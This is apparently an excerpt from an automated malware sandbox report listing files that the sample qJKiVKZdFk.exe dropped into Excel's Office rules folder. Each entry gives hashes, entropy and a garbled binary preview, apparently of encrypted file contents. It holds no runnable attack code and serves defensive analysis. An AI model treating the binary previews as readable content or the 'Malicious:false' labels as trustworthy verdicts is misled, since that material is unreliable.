                                                                                                                                      SHA-256:A7F8110424D9EB23D2C92FA87DBD6AC16CF6554827E9F631DA8B9F2C065D163F
                                                                                                                                      SHA-512:D7747D105B24F700E0FE5B5515993C31694A403507F8C4765BD7493FBA348CA8ACBFE9B8B408278B55133C56248E223A24230F5591DC3BFD9A7325DB9676464A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml&..;....-6..f....8.\.8`...Q...}.|m.#..(..m....".p2Qg..\...x.hQ.t#=...,yiq+.[.$..#.B..G....C5e..I.r...r{.U...mt..v.5..(...4.....|2....2.*"......Kt.4....I...w.....vR.|U..bt=~..3.P....5k1..wN..B..r..._....X&[.....SO%.K.Y.].*.........q]....C...?'.~8"V.hd8.g\.W...VN...y.P;.bA.0X.r.A.y..n.......[.io...:.7.5....HQ.S...y)'.,.;.C.k1..H....,wJ..Up\...*...........N.........s.[..K.....^..o...sd.K..........d.*x.P....x&v...^.c..-..T....w{.;.i..LB..x.:Kp~...E.m(/.\h..Al.P.@.K}.lB..8.Y........3...\.L.E..0...H@.V......:.......J.]...y...k..?............L.?F..@Xy.guk..\t...OU....?.q........A..1...[9...?...@XUL,Q.8.N*E@..)u....gy.+...V#..5.Y......>..:..d.:.xk..?dK......D..M........r...f?........s/.......E}M.X.A&..h^Q.K.kmS...L.....VLtp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240030v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):946
                                                                                                                                      Entropy (8bit):7.793352889650789
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:pZ4Mg42Xpd68z8G4Qh8kRvwn1Z981JF5ZIJIUbD:pZTg3pdpyQh8iw98FzIi+D
                                                                                                                                      MD5:BA7C1D6F14B31AF4ED76D995F01F91D7
                                                                                                                                      SHA1:843BA7ECF3F238BE193152731BCF4402B542A99F
                                                                                                                                      SHA-256:0B76BA0F21FD8FAA64DCF1AA8E796CEAE071BD05CB6DE2B3A9CDC4693D94CA60
                                                                                                                                      SHA-512:62BFC6DD9591FF3008855974C6152BB3E7D4CD68C4021913F80A14D5DF9802AED847D5286D04E6B523E9BA689B6E5EF9C6C23BBB9E349780624503A92EB119BC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmla.5..wO..@.'..GeN,|....W.....@.6...[O`....#DK=....-z.P_a.,z.8.W]......N.....u...D.p.l...$F.z1..f8.zdW..wP..d.[.%...C.k:..-.....S..a.K...`iA.@,...<...$.u..k.......C.5{.2......[.wR` ..R.*R...:.WrX........d1..]......'q.*;..."..#.-.Sv.3-...8;.7U.$.N%+.M..U.q.5k&..*.4...*.k.k.#.u.J].._.xR.~.eY9....d...".@.|.UK.b..h..c...;...{.z8F<`....+....I....AW.bQT.....EeP..YYF~...C.V3.W;t.k.....dA..!>..h~..s.4G...K....:.I&..%....R....Z.yaE.(L.\'>u.y...hO^9.M.n.v.....S`..b.W.T.P..;3..4..#...Y....B..._;.......l.%...t..9/.S.......V'O.E.~...1......TF.J...A.&...,[..OB.m.J*x..H...F..Z.|..#.M.}.GS|.a....".fu.Dk.F.H.....g...3Y.D..Q..6..~~~...5..&.EG#k.$....'....qq.......e...^.?..Xf..H,F..L...`q..*...u .z.M.O...=.Z....%X..._.......>.9X..1..#.>C..N.>..*Ri"...G.kV.K..R.-....]...u.r/CQ......k.c...~.>X...>..\..}..>..c......Q .6....!....`I.].S,.Rtp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240031v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):842
                                                                                                                                      Entropy (8bit):7.6898762171056205
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:MbhTxWikiiEpEz/rmlvQNrx0Jw+0IqzHbD:iTtkSpM/rmGN+wCqz7D
                                                                                                                                      MD5:D761EEB86F03E5025F4F48842229B17A
                                                                                                                                      SHA1:B72F4D6D4A2F1EE6BC6118AF9454C97A6455640E
                                                                                                                                      SHA-256:CE1482D81268B54C3C518E11F158B62FD3C7764E02579C16D782F3A8D590EF44
                                                                                                                                      SHA-512:F87091900424FAEB57976E34229244312A018D827DB7483B73CA351C0C79936B03F9FB2566E09982F42091F3955161211564C75D9895BDDF77FF85F52FD3BD0F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlN0Hm.-&.q..^>...\...Hn..n.36.kg2...po...._.D..C>....hs9........z'F.tJ-....hL...N....f....o?.@*`.wd5.@.._V@.$..uGd8<.g...]UU"{...1...S&...Z......E.PG..9n....k..jS@.6...Y.6..&.d......Q>.-......~.r.?..?..D.a6.y...v..!ib8...{...g.[.>...b.5...`....^..9..u.1`.....I.....h.~.....AS.O"4c..:...Xw.c..d.o.j.E.<E6sGA..U?N.....B.{..... .K59.'...[.....Q.F.....v......{.5.s....y.S...>. ..>{.....'B.$.lgU.Njv..<..m...;l.%=.1.[.Zw.X.8km....-Y..$..8A.^.....3.8.W..6.......9......_tI..3..3>.>P=@r.mh....3...y.{.......H.Q......G...8..}....Y.JG.>.....p...q..3.....".....[0.&w..k.Q:..W6n..F...6F..4[...*...U.@.l..S>jC."r.$E$6D...&..8.......cU.s.4O.+..j.....{.....R.u...G..9..&....(..^.}...C..-[...f.<.m.....|k..s\.a.M.."(..~.......0F.dwU0.t.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240032v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1191
                                                                                                                                      Entropy (8bit):7.830940631336714
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:P3HcQGQmqBY42eUkhpjWpKM3bTWR0h6UnBKc10vXnZNQrJHRLbD:P38VQmqu42TkjjWp33Vn8s0P8tRvD
                                                                                                                                      MD5:18289AC9B055E78A972258FFAE39AE8E
                                                                                                                                      SHA1:DA6B63530B66500F4CF8949973B97068FE0BE15C
                                                                                                                                      SHA-256:D617AF748C6EAFA457B58D6CB5BB37FA696C93692E58DE1C6251A175E6676AA4
                                                                                                                                      SHA-512:22B3A9F0491E38ADE185D66E7B44C380E621844380EDFD3E8C2D0065CC85709155C75D891F957E7FC21C5A18C16F0C63D4E8DE442B0A58E3DEA53461F8C43BBF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlL.w.{.6...`............._IT..f....w.>.Y.S...6L..B....i..'...].L.x...m.....t...&.....,l.,..1..........Q..^.5.........Z."...-.sB.K1...Q...."..Y.{..B..N.h..P....~.]i.*........0+sx..YW.......}.....m?.. ..!.s...a..1..VV...:...<....y......5|k...`(lr.@..C...$...Y...b..Th.X..*..=.@.........D.3PL.)*).".=..!.^c..9m..V....Sy.A..R.S*e[8L.ZK..........p.7%s........xAK.&....|."]cKu....n3....QD..!!...3+eY.N=.<.......E...u.k&B.GddZ..0S..N.y.......3...~M^..mmD.......k.S..5>w..rzE.4DdJ...w..w.r...I.UQS8.._-9QP..c...8.Y...{...aWM....5.OJ......m...5......%.....#.'...'.G.e.h.f[....~..a...2r..-.w.A_+..=.w..2....v..g7....2.........$...L.~F.....e.k..x.7M....b...Z..c.!..*.[8-...M.=.R.1..x*....r.5.09.A..0....h.i..7.s.F.e.B!.q.\..dgF.....<..>f.W.`c...bn.O..;....W.........../.SQ.....;^..:V..........!.E....{.X^..N....h.@o)".+\..*.Z .....EZ.nE.......r,e(QL~....2..@.=..X....PU.....J.Hk.....N5....Q..A.lQ.0)...d. .t.G...okkhv.../2.....w..fdp..../..(A....U...O.b2H!..

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240033v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1366
                                                                                                                                      Entropy (8bit):7.846701160914853
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GIxd69YaRcYsB/0kCsBSqkfoY4Wzvjb/An9eUzvT6VlYV7c3XAuT927UbD:jdNOaB/0kCBquvfQhTT6VlYV7iE7+D
                                                                                                                                      MD5:9D5659CDC59F7AF3E189045A4DDBA03F
                                                                                                                                      SHA1:9A646FB7DCCDA2295C67A2E2AFEA4CD4865DB5F1
                                                                                                                                      SHA-256:2F69CAFDC7075F3C08332AE7E555F4E0209D0C8C1256254A2E22D5328E1DEA18
                                                                                                                                      SHA-512:0671F1ECBBD394E08CB6C82E1FAD35863CE7E22DF709AD67CCEA0B7D69B3DD4F0A6ECF7B47405512107E09533E49E2A7F676BDDBE1BC64361FECA342702DB99C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlW.S-]\....Z..FS...{./....P...q4..}r..~a..F.vH......3.|8.*.......)syH].6`!.v.HJ.9Z.V..f...L...t...Y....|>.4.U2...........o.i3..k....x....q2.k..gA...s(.]..lq ....P_F...D6......<sI...z.gV."S...;.0.@.f`.....X."t..|..z.;...x4#.E.....N...B*@.1......(?..Rh..;..e..._...{.@...?.\,..BKcVB...w+..p..pw.......cA....7.X.....c$L....W:.... f..V.R..=...b.>M(..j..}*.f.Y...w...t*......x...U........~....Q.B....q.Fe7.3.....Y..v..|7..Cu.....C.%.E. D.'....k..U.\#.........>..l.wA...k....,%\........3{;...Um6(.R.s&..X9..$.}.*;.,..Dx@ ...$..(.2*.'..}H..C0..c.#j....IcD.......}gI.PQ.D.*(...8d0 . E.6.d.....T....U.....64FU..W..$)>.e.0.r*.y.......Q.^ Q..H.#..t. .W..3.h6.3p.....(t..z..6q*......Y.6..A......F......1-........DiB...4`...|......%.......i..27...V..-...B.o-.k...%p.n.J....=.Z..+....sO.*M.C.".e.bd...wwe..qaU......f.=..p./n....h.t....j...,......^_.I...=.b{N..:XX;3..A.......F..54.........X...I..G..f...(g..*....k..(.#..U.VB.'I...s.. ...&...H.OI.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240034v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):728
                                                                                                                                      Entropy (8bit):7.684665588204736
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:OMo5WdxhjiFf58t59/5OOLvQFLmF90s+i7El9aJ/mXwT2awdn6xw4aXrmM7K+KN/:VddT2f5c97Q1m70sw2BBNwd6xCX3OpPX
                                                                                                                                      MD5:420E9029EBF6B2230FD304963D91EBC1
                                                                                                                                      SHA1:5DA7F56CF182BEFBCDD34E4626CD4165DFB23757
                                                                                                                                      SHA-256:DF887C9F9297E2716A25B2FF5D995B3271D6128BA67E49ED33DE20FDFD321E20
                                                                                                                                      SHA-512:37DF6EA3F20244FEB2D3A362B3545289951A2B47B06D676ED379D7119CEB42D41C6168621002BA237D82A2AB0B1DE44ABEA5D616320542CC5637261491F1D5CE
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.z%L..W.Y.Z.x...]tq[.x(.b.P>..Gp.....z.aR..x.Ry..e.....v./8eT..../8=;......}%M9c\.4....z^..X.K../....k..'7......E..k....Ki..F.I~.w.+f]IQ~.e....5...*.1]...5.(.q......~.@.wR1..?.....7(_U.ALP.0d=..= .......Fd._=r.}1..z.....K.%......S.....9pv.....:.S..Y.&...+...e.sA..m.G.A........=.%|{6.k3..sW%.........*'....`P5...5.e.K....:M?......lQh[.6..w....V[.-m.a)..ZH.VC...p.yT.o.....-...l.5.Z.q.3~..w.L;..D.J:..1.i......H.^...0KfJ...~.s.......:F.../Q.....}..5m..Sm...O.S.M..$.D.X.$..B."...Ul.p...U...i.I..[R....q.'...&5......9.k+&...+.m\a..s.'..*+.j..H..jtqq.'.\a.......[6..1F].Li^.....&..MQ.....<.w........M..wa...w...kH.....\..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240038v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1088
                                                                                                                                      Entropy (8bit):7.793672193945322
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:okzAOZF9frLn2kBtG5ndHariwvgA0SrRgPTQJbD:9/x/nxYhLal0Rb4D
                                                                                                                                      MD5:5CA3516E115FFE93192438640896B5B3
                                                                                                                                      SHA1:0C74B8600B10260A867A9AD69EC14A7F30F7210E
                                                                                                                                      SHA-256:17B0C295FB2A3232123E3349A54345E798EEDE4BCECB64D470A3E2015D48177B
                                                                                                                                      SHA-512:3A82A9B425E1CBBB43B2AFAEF582EA2DEBC199A0F9D8F07120726D5AB9ADD689CABFD832C47C87A06CD88C83B10AFAC09940E585CECF66797B466AAE8A76CB11
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlUc...[!..>.;@.P......_....|...L./+.f.P....w\.....Xp.-...'..d...IA........)..n....f..6..s.........Z>..pG..p...C..l?.}..TNE.-..gE.('...m'.'..+.z.|/..........rE.. .b.7gr....#t"Ms.x...s...>.R...h.....k.......$.....UwrB...)..n .L..;a./.....^P..=.}..,. .@;..R+.6.D3M..A.?..]?T.q...7.D&.J....6...XN.E./Z...~u.E...C.....;..b...WBu...:.:.s.X0..o..b.F..........P...l..v-..w..(+...I.Es.tm...*e...M.ySUC.fm....^.@.'.2...YJ)*.....gU........K.`.P.$...[...7U..u".).=...f.xE.Z....!A..pw.....Y..q..,:......Z......;....w...\.4t.8b.5.a.5.PU..si~.N......'*}.....L....$.I.f..O.5...V.ct..........k...k.K.3.2YdS...d.q...I71bR...\..F..5..T........qA..w1.R1.]....**..&#..!.Q.....v..y..B.^.`.....T....Qo.......:.i...2h.W.=....W..o.m...mSK..m...[.9%.O~..fQ".....&V...=/.i..1..M......67....-.........u@....%CD.u.ak.o.}.....l...De}...O..h...b....ist.g..E..6..!..W..9I..<....U.t".lt@...F.Y 5/...*+.&q.....iU.`....{.....Q.......j.g.O.8.~.....J..E....a.?..m^>7<

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240039v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):999
                                                                                                                                      Entropy (8bit):7.736915560658201
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:gCsaVQidFxHKDOHVod/pseMYAcRPFFzBuAJMsZvyU938ScVm0KxO9O3ZTgJXxNIQ:gLyHKD8028AutBueMoDt1qN4tIGUbD
                                                                                                                                      MD5:91E40775B3111FE20C85B869BAD66D90
                                                                                                                                      SHA1:D99F75450380881C39E9E07978FB68CEE6E43FC4
                                                                                                                                      SHA-256:AEE7EB731FA4DB17B30BC5D3E610C63A2E7D1C835A3DD09F44CE62E7D90C884E
                                                                                                                                      SHA-512:A623F6448050BF77E787E59B18F68E8694282D445FB9683FAA6AEA9AF0754FCD0F4E5ECDA3D86C110981B94FD77B46421152DCFC5DEFDE2EBDFF4F5F98534819
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml].A..J.S)V..0U..+.........fs..R.f.&m...*.2.....*/_`.....;.......N.A\....k.....a...2...{...|d..|...TF..<5.....2....7......'.W...bi.h..$..#m0....t..u....j...@[.oXAo.B...M.;..Mb..%<...b..3\.e.oc5.6Gs.h...V.&..H...J. .e.El.t........G....Q..6.......X...+..~...\.....j.wXr.F....#.~.Cu.....|.E%|..i.{D..o.`.yI?..... .|~.;[{..M%.2.0ZP.=%>...MZFC....3I......ZJ.!.l..... ..2.....fr.[rEpEx5.Y...,.f...m.M@D.Z8,.>..y......... .4..F..U..#{cS=a+a*..H.R..il.46\.L.d..Z.J.-q.36...@G.=A...o.U.......)./...F.....%R>K..S.........^....6.(.$6X........F.+...^Bw...:..=../..]..\..(......Q.0K.s...5{._....'..Y.g./e*.+S..D...5..t..f.F.+..GN.P.o?9w...:K.7.o7]...NZ.+32....Dh2.|...d...H........X..........F...A......=l7_...@'....l.qG....L..Oc.a9{U..>[x..6.....O.... :G....m7. zX.....}.....A/L2.o.....y.-..W.G6.....)LR...hD.'..~..r.M...._..o..O.>...CV..?....v..D.Ln..W...~...Uj..K.Z.^.l..r6.w.P%.%9...tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule241000v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4446
                                                                                                                                      Entropy (8bit):7.957161747342068
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:w829cJg3mGBLgQsa8pBgDareio+4wDe5Sk72ylwGXm1mkLG:wvuJg3mGBeaqgmreio7waR72yugmxi
                                                                                                                                      MD5:86DC8CE3249FB6E5BBE14D3C33D73B84
                                                                                                                                      SHA1:1B6CF0AF2BA6A1618DDB04C4D91D7511F38392A3
                                                                                                                                      SHA-256:8F2391E4270137353965788EDCBC07CE86B29F78BF6F011BD293A88BFE5A16F6
                                                                                                                                      SHA-512:9585205D33994DE75C37496A3F96C2465171DED995D8D1AB703E5ADF6D8F7679ADBBEAC289B79A23C84857BA9D201AF050A8E6547CC8D6B2653C550E2182CA18
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.Y..U.HX......f).........m8.(...V|...f.X~.[:....2S...do.F....!..7.9.q....q......w.P.p.......?.....T{..;6.(..3...'T..*/Qbia..X.Qzs,.m.J..m.q...'p..#4....7.....*f..5....&......1&.co....p$.;({uq...O<p.jL...7u.o...M.J...;.@............#l..L.;.........O......H..Df...GW.s.LC.S.Q...N.....w/*..^..C..Y.xL.......m.:Uu....wA.4..}y..Z.W...........^...i.L.[.;.N.;K...NE..j..%....??8.......p...:C...V....9.Y..f..... "9....l.SK.3+...E...1....NOGE..K.E.0=..C.=....p...7...j.....&ejt|"X.s.;.xr......p.K~.(.37TP...2..c...[.q..'.o..?......|.F?.~FY..H`3.a.E.....+...3..hS.mCEV...^u....u.NC..*k.#4..qRA.8....&....R. E).@J.2........a...%*.........C.<Y.2.YOqw...XP...@..GE....&.'.:......../^U...q.l74.|..1.....R.l...D..t..I.....r.OJ..oB.$.Tb.h...h1Ej.>2Xe.(.sf.,i.<..R.qa.....N..9%.[...v..F...2F......lt.d.7?:,.g3..W.CHx.I1.X.tw...YR.[k..&D...ka.hxm'..>N..Z../..R6..u........-.%.?...k.j56%y.'.A.Z.`..T}...%A...~qz..#....}..H#...M..0'kK..49...mw.....u]5.....?(Bp...

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule241001v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2306
                                                                                                                                      Entropy (8bit):7.899582094450299
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:QOtq68Px06QOzLOCa2Yba/x6/6odZPG1RZGb/zD:QpPRQOxl4/6cZPqLGbf
                                                                                                                                      MD5:F2B60336787FD101C287A1AFF715690E
                                                                                                                                      SHA1:38F03C942D1CB5D8DD445C3FB5D68F3F873061DC
                                                                                                                                      SHA-256:DBEC8ADD77EF3138DD415CAAF714B5941ED4EE33A711F66D4D5146D9D3A750B3
                                                                                                                                      SHA-512:F0F88AB544BCAE4C154EA8BD9987A36AAC9237A1285F6F7C4DE9CC466061FD05ADF3C2F5512289B12A443179A901C8F301F109A3F3DCD27F4E5D496AE56C68BB
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.6.=..%JJ.[$.....'h.....=_].P..P...v.~.m......Y702..^.....?...gi2K<...;9...f'G....A^.......4y4..:.[....()H..fR.X..s. J..bm.y:.o.~tE.k..{.e{..)..l...[..>5~sr.....;.a......c;MT...&..V."....A.e.aF..k..piPgBI...p.+7..i.U..u.m...)..!.>/..._.>(..........7..........*..?.$&.f....r8..K.v.......Y..k.r.a.U....A=.......)..(.l.....+l.^.~..g....k..,...f.............;.F.%.dsI....F.H.WQ.q...@.....G]E4.;\F....:.f......!Y.g.Bv.X..w..2..>m.]....R.I.>^I.L..7.w:.. ..C.bWC.......J...x.7.Le.2h.2.........x..J7.9...CS..Z.....Q.S-.5..H.;[.>......3n.o.;.s.|.@Z.g|F...t.-.[.S.T..D..........&G.Q1.#./....xA>..qr.q.;`N.`......E+....b.q.#o.U..]Y...,D..]...U..."..H...7...*....S[.EV..y:.j..\q....KN..|.X.}..\..~...?.}d.~N..*..k.N.>..m^.D|h.y.q...$....)=v...G}.l..<.<......7,v.c9H.~..4N.gR1h.Jj..Z..V4..=..D.F.8,.._v...^.y.._2c.....M....h.K.....&aV.....7.Q~.....RH.v..+........^^.k.,|.!....9l.=.2.C..B...]..1.)Q.N....3:[{...;J#.../..@......q..cJ.0*.j.5A....3

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule241002v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2376
                                                                                                                                      Entropy (8bit):7.917036991369323
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:WLq31EhfZdzxFAAC0BznVWvww7RAg/L9+6rw6iarD:8q3IRdzxuAz8vJ7RL/L9trpV
                                                                                                                                      MD5:82F0F5F6F4733B36EB32875FBBF7F146
                                                                                                                                      SHA1:BBA63C232EB97DA717D2F2509E0EA4FCD637D350
                                                                                                                                      SHA-256:3D3D4E9D9C420574F7B5CACF57B1792ED291F09DD4DC9611843D2588E3A8F98D
                                                                                                                                      SHA-512:E8575194EA511671EFD547CE734BC4019C20296C8AD22B7C0DA1C86A34C75F2F6FEBB81B7658FF374621629A5BB482A09F389DDDF811CDE5CD667D0E0B221C09
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlB...T_.G.O....c.....D..v...."..K....:.|.p7p.^...7....(@-./.>..:..@....m......4j.T...>.A........duq.=.P..g.....S.?.0..?-...;.Cj.#>j.I....A.S..c..<...lh.k.cJ.a..8H...FO..@...?...._y..JU.T..A.....(.-./.P.J.J..@P.....&.U....8wh.|`.N...=..w.Z.# B...}.+.D].NJ.}.....&.?.58.....h.*...G9cV....g.Q.(.J49..;......z........S..ZN.4&.W@Y.:4..b.91.n...e].j>..A....`.......t.........../../(.Z...M.U.......O...........E.iqH.fa..b..So.b8....mj..CWv.....n..r`.i..96.o..>..S....).#.....zGI_.K.......gQ..j....:/T..n/.M#.PzG.#B....tAK..A.&.'.K...C...|HC!....~....D....X.1. Z...-..U......dX...Y.@.#...!M.0.7z...u:.c5.............3.XJ.D...Z...:3......+F.4..Wk;%d...>.u.-N5.)#c.^.....B......Xr..]..5i.h9.PJ..$.GP.).m<....CR.Na.[...~....P..<.!.&...l:.l.n...........v.....c(...ybn...N...OU.q..._!~#....U=B.K;....'~f.UCJZK/..i_....x...C..ik\.\>,..`.%..H.-...a..M...h.SM"......$..LA...DAu'7..(..V.T.SU.5.mSF.N.....a.w.._...PE...Df.2..G!mG...Tq.N..n>j.Z .Z.....T.G.),.....$.%.....g

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270000v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1043
                                                                                                                                      Entropy (8bit):7.802065458890835
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:W+DxIfn4RfyBWb552PiBHVSdgx7MHnIXWKIEomXdbD:WWxIQEu552KFIGxAH+LvoedD
                                                                                                                                      MD5:3760F939249DBE2572B0D27A3D600DD8
                                                                                                                                      SHA1:8482D5E6BD21441A2846F3D1D5DA1C370D68E2F2
                                                                                                                                      SHA-256:8D80A2BB8F69A11F2A159F805D525A952DB1ADDD483AD811AC52C2C8F87B79CE
                                                                                                                                      SHA-512:3D3BCE2A4DEDE4AF21A7EF52E707467D3BF95FC99E4262B6A437EAD99E3749838105D73117E459B6C0A041DCD5E4BC453B9CCDE32A924392EB7EBF572FD9D64D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...w.)}.G:.P<.R!.[.q..E.*...T.5......X..{&. ...s...=S...Z...6;.z;\KA..U5..$.B.~..n..^.3...<C..py.....M-hP.....i....V.H.....{?.......0y..Q..`...y..b..U....{.=...[2...Fhu..6.dd.....5....Wes[..c.%?.k...xpH..7..L..M.he........|T6...%">.<-......3.o.......n.7..x;]...t....QbCc|..Y..*./..r..........1...P-p.w.z.|k....z.....3...x.v..7Z.=B.r.@!=.<../C.Bh.l3...W].8.^..QS.(..oR..e3...`.4..s.....D.C.9....Tf.i.F.!e.H@.@.........E]{j..7..E../t.B.....B.A'..0.z~:.....9.J1.E{.....-..c,o.k.j.......T.9MW].#0......L.......yn.Y].d,..(.v].,..xC..Y.7\k.z....2uX$...$.......8.....X..\..)..N.:.H..P..NDxf...sq.l(l.".5..H.;..N......q.$-aQ.....A...{....x+..f.Sg...K.P..I..X..5"....J.G%F..S.4..8.$.$.(...|..nm{......,..@..^...wl.#..2.].a).....Gc8....A5.\.N!......2.9a.\g..I..i..U.PW.*......2.....nc...M]...P.?w...?...7!..cp..T.x.9..8.h)|.....u.q....F.:..-../....L....W>x.^...5.6gG..*;..Y..oM."D...r^f_.k...Wp.Y...~..0.+..F{.eT.HS..].tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270001v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):961
                                                                                                                                      Entropy (8bit):7.765239647660804
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:F21Cvn+HR1FeTlJFiaZouIX6NY/j3i03p5XReySFm25bD:FQAn+HR1kxJFiajI6NOj5LXRey2v5D
                                                                                                                                      MD5:DF259C82FE50C867FD188712A8D30A12
                                                                                                                                      SHA1:6518AD59475CF0FDD3A0EB765F93C38E5CA1F72C
                                                                                                                                      SHA-256:107F09EA2360B26CA365664C0F9FED1C1106E6A8169F4F101E8D73A424F8604E
                                                                                                                                      SHA-512:67303CB616E07E0279574352372974F5C2A00672BEFF115E61BF4EB612DCAF3D602730257E590595604897E8E7314AD08D4BE114BF13CA76D4F0FFBFEE21408B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...J....$....gg.I.v.]...\Y..M.I....8......-../.:...)...l.~e{.`....".ns...=y.V..ci...nX0...4...c....R..t/.g...IW;....5..,j.....G@.YNz&N...X..Q..w~.....>i=..R]S5.B.P=.....C.h.....(...m=...4.S.`.#..u{_{.^...x.-...K..%.es.)yC...E.....N....@cUD'.7.WG.>).ZT.%.!...B.R.&..<...Z.......V8W5..C...A.h...yzp..w...J&..c........O.*..w.....7..r~HNJ..Z.tG.....|S.....b......8..^*..8,..5...-K=.[...2.."...s.[e........C.......Z..=..s@f.?N;...9..Y.Y....n.....r........n*.....]\.<U-Mk......`l.Rw.......'..^=u...O..p..X.L.`~..U.?e......d."]......CA....M.IY-...=..|..A..5..Y....[....G...n'w...9....Z....?..c....s.......a.....EZ..r.B.*0D.9.Z..9....'`..}85W.'+C3....S...z.2w."$a.Gn..B*.sg.a..B.8.4;.E..Lq......p...=@.'..tb..-......`<..D.f\.t`N.....l.6!'....H#..Q....U....O...Z.1-D...~......Y[......9..0.`e.hOZ.f.).}.ZfcKP.`..G...Y... P..X..\.F.z...Q...r%..8.=.P.ctp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270002v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
